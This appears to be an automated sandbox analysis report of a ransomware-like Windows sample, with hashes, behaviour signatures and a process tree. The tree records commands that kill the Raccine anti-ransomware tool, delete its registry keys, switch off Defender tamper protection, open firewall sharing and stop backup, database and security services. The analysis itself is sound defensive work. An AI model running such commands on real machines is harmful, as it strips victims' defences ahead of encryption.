Overview
overview
10Static
static
100361e25d7f...le.exe
windows7_x64
100361e25d7f...le.exe
windows10_x64
10121c11c405...le.exe
windows7_x64
9121c11c405...le.exe
windows10_x64
916e6e08c37...le.exe
windows7_x64
916e6e08c37...le.exe
windows10_x64
91d4db8733c...le.exe
windows7_x64
101d4db8733c...le.exe
windows10_x64
101e189b1013...le.exe
windows7_x64
101e189b1013...le.exe
windows10_x64
102033194ab3...le.exe
windows7_x64
102033194ab3...le.exe
windows10_x64
821dd66ef4b...le.exe
windows7_x64
1021dd66ef4b...le.exe
windows10_x64
102d3d1b8306...le.exe
windows7_x64
82d3d1b8306...le.exe
windows10_x64
847b51b615f...le.exe
windows7_x64
1047b51b615f...le.exe
windows10_x64
84fefb51009...le.exe
windows7_x64
104fefb51009...le.exe
windows10_x64
105026eddb6f...le.exe
windows7_x64
105026eddb6f...le.exe
windows10_x64
1050ece411c1...le.exe
windows7_x64
1050ece411c1...le.exe
windows10_x64
10551129c0d4...le.exe
windows7_x64
551129c0d4...le.exe
windows10_x64
1058bfb9fa88...le.exe
windows7_x64
58bfb9fa88...le.exe
windows10_x64
105e088eb0eb...le.exe
windows7_x64
105e088eb0eb...le.exe
windows10_x64
105e998fa65c...le.exe
windows7_x64
105e998fa65c...le.exe
windows10_x64
10Analysis
-
max time kernel
23s -
max time network
156s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
28-05-2021 09:57
Static task
static1
Behavioral task
behavioral1
Sample
0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
0361e25d7f958c3e5f76eb62917004939f40c020e2303c97ab8be431199baa6f.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral4
Sample
121c11c4054bce9730e87051eb734241b787ed4b5523db2c1226c29776501717.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral5
Sample
16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral6
Sample
16e6e08c37a95acc32a5f05db98e1dab07d52e3ab4ee415c67c8aaa006e8179d.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral8
Sample
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral9
Sample
1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral10
Sample
1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral11
Sample
2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral12
Sample
2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral13
Sample
21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral14
Sample
21dd66ef4b2d0bf877fd6386c3dbc43457f982f5f67eed23c8b7c34234cda448.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral15
Sample
2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral16
Sample
2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral17
Sample
47b51b615fe22292caf30a30a4d4057cf57a283a61045190b2a2331b763b6125.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral18
Sample
47b51b615fe22292caf30a30a4d4057cf57a283a61045190b2a2331b763b6125.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral19
Sample
4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral20
Sample
4fefb51009b09d77ae3300be1f350dd0d301cbaac75b50053dcf1a39673302b7.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral21
Sample
5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral22
Sample
5026eddb6f757aba5701d674a948372f2436756ee6a72c95228801a782f649cd.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral23
Sample
50ece411c1c1a69d1c495e7aa6af8e812dfa08dfd987e096ce57707da1054f85.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral24
Sample
50ece411c1c1a69d1c495e7aa6af8e812dfa08dfd987e096ce57707da1054f85.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral25
Sample
551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral26
Sample
551129c0d4dbeab8bef925857df93715036503429afedac79f5d8d1a1b9fcd5c.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral27
Sample
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral28
Sample
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral29
Sample
5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral30
Sample
5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral31
Sample
5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral32
Sample
5e998fa65c06064bc6207bbfcc92ba0ec86a56b7537064076000cbc24a7878eb.bin.sample.exe
Resource
win10v20210408
General
-
Target
5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
-
Size
108KB
-
MD5
f06010cbf89e396a78cebfd0456e1859
-
SHA1
33306e22ac0fa20a49cbbce252e08be91ac4414b
-
SHA256
5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4
-
SHA512
08d1aed5b3b797000fcf1005e5b3a4d991e0c68de0ec297238bc2822fe9d21d19d599f892aef7369cca8d2a5dca2dfac73fcf7441429153a66aa58a2039f1f29
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
Signatures
-
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs
-
Modifies file permissions 1 TTPs 9 IoCs
Processes:
icacls.exeicacls.exeicacls.exepid process 12476 icacls.exe 11728 icacls.exe 7160 11828 14704 14292 4760 icacls.exe 6552 11148 -
Processes:
5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 1 IoCs
-
Kills process with taskkill 64 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5612 taskkill.exe 15736 13544 12732 11496 9388 taskkill.exe 8164 taskkill.exe 11832 taskkill.exe 14260 13820 7988 taskkill.exe 10096 14044 9268 7220 taskkill.exe 5692 14600 7268 14604 5812 14148 9108 4292 15912 13548 12568 9372 taskkill.exe 9292 taskkill.exe 9236 taskkill.exe 13724 13736 9284 taskkill.exe 15588 12652 5148 7204 taskkill.exe 9244 taskkill.exe 7484 taskkill.exe 11756 8168 7416 8048 3756 taskkill.exe 4588 taskkill.exe 15104 8492 13812 4908 9348 taskkill.exe 4456 taskkill.exe 13080 taskkill.exe 15584 5432 5528 13224 9916 12540 9252 taskkill.exe 4000 11688 9340 taskkill.exe 9228 taskkill.exe 7372 taskkill.exe 7452 taskkill.exe -
Modifies registry key 1 TTPs 3 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
pid process 7016 -
Runs net.exe
-
Runs ping.exe 1 TTPs 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exepid process 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exepowershell.exetaskkill.exedescription pid process Token: SeDebugPrivilege 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe Token: SeDebugPrivilege 2024 powershell.exe Token: SeDebugPrivilege 1508 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exedescription pid process target process PID 4064 wrote to memory of 2024 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe powershell.exe PID 4064 wrote to memory of 2024 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe powershell.exe PID 4064 wrote to memory of 2024 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe powershell.exe PID 4064 wrote to memory of 1508 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe taskkill.exe PID 4064 wrote to memory of 1508 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe taskkill.exe PID 4064 wrote to memory of 1508 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe taskkill.exe PID 4064 wrote to memory of 3344 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe reg.exe PID 4064 wrote to memory of 3344 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe reg.exe PID 4064 wrote to memory of 3344 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe reg.exe PID 4064 wrote to memory of 1432 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 1432 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 1432 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 3488 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 3488 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 3488 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 2824 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 2824 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 2824 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 1392 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 1392 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 1392 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 2248 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 2248 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 2248 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 3264 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe sc.exe PID 4064 wrote to memory of 3264 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe sc.exe PID 4064 wrote to memory of 3264 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe sc.exe PID 4064 wrote to memory of 4116 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe sc.exe PID 4064 wrote to memory of 4116 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe sc.exe PID 4064 wrote to memory of 4116 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe sc.exe PID 4064 wrote to memory of 4148 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4148 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4148 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4212 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4212 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4212 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4240 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe netsh.exe PID 4064 wrote to memory of 4240 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe netsh.exe PID 4064 wrote to memory of 4240 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe netsh.exe PID 4064 wrote to memory of 4268 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4268 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4268 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4300 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4300 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4300 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4372 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4372 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4372 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4404 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4404 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4404 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4452 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4452 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4452 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4496 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4496 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4496 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4540 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4540 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4540 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4584 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4584 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4584 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe PID 4064 wrote to memory of 4624 4064 5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe"1⤵
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2024
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1508
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:3344
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:1432
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config Dnscache start= auto2⤵PID:1392
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SSDPSRV start= auto2⤵PID:2248
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config upnphost start= auto2⤵PID:3264
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:4116
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵PID:4240
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵PID:4624
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y2⤵PID:4692
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop bedbg /y2⤵PID:4756
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop bedbg /y3⤵PID:4164
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:4828
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y2⤵PID:4972
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SQL_2008 /y2⤵PID:4360
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵PID:5124
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y2⤵PID:4204
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y3⤵PID:5508
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:4748
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵PID:8416
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$TPS /y2⤵PID:4896
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y3⤵PID:8432
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EPUpdateService /y2⤵PID:4932
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y3⤵PID:8184
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:1560
-
